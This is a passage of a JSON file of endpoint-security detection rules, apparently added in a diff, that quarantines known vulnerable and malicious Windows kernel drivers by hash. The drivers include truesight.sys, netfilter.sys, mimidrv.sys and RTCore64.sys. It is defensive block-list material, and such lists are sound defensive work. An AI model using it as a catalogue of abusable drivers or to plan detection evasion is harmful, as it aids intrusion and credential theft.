"6703400b490b35bcde6e41ce1640920251855e6d94171170ae7ea22cdd0938c0", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) 
[https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f2e735d-1e9f-5c96-9e6e-38231136ea15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967381Z", + "creation_date": "2026-03-23T11:45:29.967383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9804787b31e0025dd2ae9344ca1beae2e701cdf8fd77a60f424295dc9280dc89", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f2ef343-e9c8-51aa-8b2d-f3525e6c9c6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149282Z", + "creation_date": "2026-03-23T11:45:31.149284Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecf7fef0a3e19f21730760600c6fa887466ccc39f1e2dde96cada2f2e02f65d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f313f3a-8bc2-5d1b-80ba-59a4c92405c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469600Z", + "creation_date": "2026-03-23T11:45:30.469603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469612Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f424562623d0edf9b506a5f65b23427e7ec9a476570646d2a08ae9fa9fc57305", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f3853ea-c3ce-5a8d-8185-eaf4ddf94530", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829861Z", + "creation_date": "2026-03-23T11:45:31.829863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829883Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "825578c10c86e4aeb9dd971df6e87becbcf3566350aedd9d296a57b9647f78e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f3c19fd-5299-5558-993e-fcc94120d591", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141698Z", + "creation_date": "2026-03-23T11:45:31.141700Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141706Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65a1610e10217ccbe221fa54dd8403b632267bd82326460c918faeb5bb960058", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f3ee1eb-525c-53b8-b1cd-7c98b06564db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487254Z", + "creation_date": "2026-03-23T11:45:31.487256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afd5b0e98eacebd6ee17cb1fc7039c07651a5c218524e2714434806fe00e4263", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f400690-869a-5d92-b551-3b8aaf2b8c32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604907Z", + "creation_date": "2026-03-23T11:45:29.604909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96a5d22ea53ee40f15528f4c19cac0b121a89b65e5c70488819c2fcd7c95d24c", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f4561ad-ea5f-54f3-a8c1-8046e0b552ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473601Z", + "creation_date": "2026-03-23T11:45:30.473604Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67b4d4995c9a054e90af05d7e04baf39759c478a519a3c729cbf6ffb041ae7cb", + "comment": "Vulnerable Kernel 
Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f4a1f5d-482e-5cfb-b96f-d16f6a3098b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159900Z", + "creation_date": "2026-03-23T11:45:31.159903Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159912Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32e30d7996c58ff8a86d6da9305b3f33efd0635d3fee2b038e71ef0e8240ea62", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f4beae0-9bca-54ea-8991-88c830476179", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978318Z", 
+ "creation_date": "2026-03-23T11:45:29.978320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce", + "comment": "Malicious Kernel Driver (aka wantd_4.sys) [https://www.loldrivers.io/drivers/72637cb1-5ca2-4ad0-a5df-20da17b231b5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f5d4374-cf12-54d8-a471-e3794bf03308", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832352Z", + "creation_date": "2026-03-23T11:45:30.832354Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19fe9e32765d6e3f4b9950d5a04970ffd65845a3eda96aacf2378c0ec401d664", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6f66f970-5cbd-543c-b0e3-78b73ce09a22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983851Z", + "creation_date": "2026-03-23T11:45:29.983854Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983862Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47dba240967fd0088be618163672dfbddf0138178cccd45b54037f622b221220", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f685ca9-67c4-510f-947e-9eeaa43068a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492592Z", + "creation_date": "2026-03-23T11:45:31.492594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492599Z", 
+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e32bca5cfb81aad5d03aece6d63089c804460e9e8a4e7d8fbd536022542d3ea9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f6cc55d-f3ff-575d-9bd2-28bcc1752717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618373Z", + "creation_date": "2026-03-23T11:45:29.618375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2a4ddc38e68efd2eac27b2562529926f5ade93575a82e8d3e0abb2b37347257", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f6de817-e32d-585c-a3cd-090197be81a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464397Z", + "creation_date": "2026-03-23T11:45:30.464400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f6f724b-4d8b-5dbb-976d-006ff9d85b44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475092Z", + "creation_date": "2026-03-23T11:45:31.475096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"413d1f175419d5fbda10ba5c013c33b6efe1ba8b762569e9a1e807dfdf7c95e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f7d33ab-5e24-5a43-80d5-7af7e93da031", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821411Z", + "creation_date": "2026-03-23T11:45:31.821413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0bf7a1cb69e0d19175fad6aaf6ca07d429f06a6decc636ad221bd72e78ca36f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f7d3b82-c47c-50a1-8c68-386690484bff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148485Z", + "creation_date": "2026-03-23T11:45:31.148487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b154b1a86b758c420b19946aba1773fbe02f74fe9f37ce273408465e14ec99f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f7fbff8-dae0-529e-a3f4-428258416740", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156432Z", + "creation_date": "2026-03-23T11:45:31.156434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156439Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ce80f5eadb5ad84daa4fb31691fd23799a3aed88ab9f4485a35524ec9119c9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f8038e8-ad84-577e-a437-7e1bce149459", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829631Z", + "creation_date": "2026-03-23T11:45:30.829639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "338c3f1c416ed3bd38103c35ea76b8ca9e79c903cf00c72c15794c185032de28", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f960064-4aa2-5823-9954-12e522acc763", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.821385Z", + "creation_date": "2026-03-23T11:45:30.821388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7553c76b006bd2c75af4e4ee00a02279d3f1f5d691e7dbdc955eac46fd3614c3", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f99187b-0598-56fb-bfea-a910282ba4e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607900Z", + "creation_date": "2026-03-23T11:45:29.607902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607908Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f37d609ea1f06660d970415dd3916c4c153bb5940bf7d2beb47fa34e8a8ffbfc", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6fb9ec09-20ab-5b14-9a3a-3f7b6fc9c5cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979274Z", + "creation_date": "2026-03-23T11:45:29.979276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8", + "comment": "Vulnerable Kernel Driver (aka d.sys) [https://www.loldrivers.io/drivers/7a7630d6-d007-4d84-a17d-81236d9693e1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fc33a70-602c-593d-8d12-c9913cdbcc7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465568Z", + "creation_date": "2026-03-23T11:45:30.465571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465580Z", + 
